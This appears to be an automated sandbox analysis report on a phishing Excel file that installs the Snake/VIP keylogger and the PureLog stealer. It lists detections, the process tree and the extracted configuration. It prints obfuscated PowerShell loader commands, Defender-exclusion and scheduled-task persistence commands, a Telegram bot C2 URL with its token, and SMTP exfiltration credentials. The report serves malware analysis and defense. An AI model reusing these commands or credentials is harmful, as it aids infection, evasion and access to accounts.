Windows
Analysis Report
SecuriteInfo.com.PDF.Phishing.7B6B.tr.8047.20915.xlsx
Overview
General Information
Detection
PureLog Stealer, Snake Keylogger, VIP Keylogger
Score | Range | Whitelisted | Confidence |
---|---|---|---|
100 | 0 - 100 | false | 100% |
Signatures
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected PureLog Stealer
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
AI detected suspicious Excel or Word document
Adds a directory exclusion to Windows Defender
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign process
Installs new ROOT certificates
Machine Learning detection for dropped file
Machine Learning detection for sample
Microsoft Office drops suspicious files
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: System File Execution Location Anomaly
Sigma detected: Windows Binaries Write Suspicious Extensions
Suspicious command line found
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Yara detected MalDoc
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match
Classification
- System is w7x64
- EXCEL.EXE (PID: 1208 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
- mshta.exe (PID: 2480 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
- cmd.exe (PID: 2040 cmdline:
"C:\Windows\system32\cmd.exe" "/C POWERShELL.eXE -Ex bYPasS -nOP -W 1 -c DevIcECRedENTIaLdePlOYmENT.EXE ; ieX($(IEX('[SyStEm.TEXT.eNcODinG]'+[char]58+[cHaR]0x3a+'UTf8.gEtsTriNG([sYSTeM.COnVErT]'+[cHar]58+[CHAr]0X3A+'FrOMbaSE64stRING('+[chAr]0x22+'[base64-encoded payload omitted]'+[chAr]34+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
- powershell.exe (PID: 3096 cmdline: POWERShELL.eXE -Ex bYPasS -nOP -W 1 -c DevIcECRedENTIaLdePlOYmENT.EXE ; ieX($(IEX('[SyStEm.TEXT.eNcODinG]'+[char]58+[cHaR]0x3a+'UTf8.gEtsTriNG([sYSTeM.COnVErT]'+[cHar]58+[CHAr]0X3A+'FrOMbaSE64stRING('+[chAr]0x22+'[base64-encoded payload omitted]'+[chAr]34+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
- csc.exe (PID: 3312 cmdline:
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\d1xzy0xm\d1xzy0xm.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
- cvtres.exe (PID: 3328 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4D56.tmp" "c:\Users\user\AppData\Local\Temp\d1xzy0xm\CSCCF15997BD6B546CEB43AF983F4CD5CA2.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
- sihost.exe (PID: 3408 cmdline: "C:\Users\user\AppData\Roaming\sihost.exe" MD5: D02CC222E09FD373FAF4030AC735618C)
- powershell.exe (PID: 3472 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bKVNuVuE.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
- schtasks.exe (PID: 3488 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bKVNuVuE" /XML "C:\Users\user\AppData\Local\Temp\tmp8AF2.tmp" MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
- sihost.exe (PID: 3620 cmdline: "C:\Users\user\AppData\Roaming\sihost.exe" MD5: D02CC222E09FD373FAF4030AC735618C)
- AcroRd32.exe (PID: 3176 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding MD5: 2F8D93826B8CBF9290BC57535C7A6817)
- RdrCEF.exe (PID: 3940 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043 MD5: 326A645391A97C760B60C558A35BB068)
- taskeng.exe (PID: 3636 cmdline: taskeng.exe {6C210698-E638-4D51-B8D8-9F29DBC70A32} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1] MD5: 65EA57712340C09B1B0C427B4848AE05)
- bKVNuVuE.exe (PID: 3712 cmdline: C:\Users\user\AppData\Roaming\bKVNuVuE.exe MD5: D02CC222E09FD373FAF4030AC735618C)
- powershell.exe (PID: 3780 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bKVNuVuE.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
- schtasks.exe (PID: 3816 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bKVNuVuE" /XML "C:\Users\user\AppData\Local\Temp\tmpA3FD.tmp" MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
- bKVNuVuE.exe (PID: 3948 cmdline: "C:\Users\user\AppData\Roaming\bKVNuVuE.exe" MD5: D02CC222E09FD373FAF4030AC735618C)
- bKVNuVuE.exe (PID: 3532 cmdline: "C:\Users\user\AppData\Roaming\bKVNuVuE.exe" MD5: D02CC222E09FD373FAF4030AC735618C)
- bKVNuVuE.exe (PID: 3556 cmdline: "C:\Users\user\AppData\Roaming\bKVNuVuE.exe" MD5: D02CC222E09FD373FAF4030AC735618C)
- bKVNuVuE.exe (PID: 3504 cmdline: "C:\Users\user\AppData\Roaming\bKVNuVuE.exe" MD5: D02CC222E09FD373FAF4030AC735618C)
- bKVNuVuE.exe (PID: 3560 cmdline: "C:\Users\user\AppData\Roaming\bKVNuVuE.exe" MD5: D02CC222E09FD373FAF4030AC735618C)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
404 Keylogger, Snake Keylogger | Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. | No Attribution | | |
{"C2 url": "https://api.telegram.org/bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendMessage"}
{"Exfil Mode": "SMTP", "Bot Token": "7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU", "Chat id": "403948698", "Email ID": "yUiavQX8", "Password": "us2.smtp.mailhostbox.com", "Host": "favourcloning@gmail.com", "Port": "587", "Version": "4.4"}
{"Exfil Mode": "SMTP", "Username": "jyotis@sixilncoln.com", "Password": "yUiavQX8", "Host": "us2.smtp.mailhostbox.com", "Port": "587"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| JoeSecurity_MalDoc_4 | Yara detected MalDoc | Joe Security | |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | |
| JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | |
| JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | |
| JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security | |
| JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security | |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | |
| JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | |
| JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | |
| JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | |
| JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | |
System Summary |
---|
Source: | Author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems) |
Source: | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) |
Source: | Author: Florian Roth (Nextron Systems) |
Source: | Author: Michael Haag |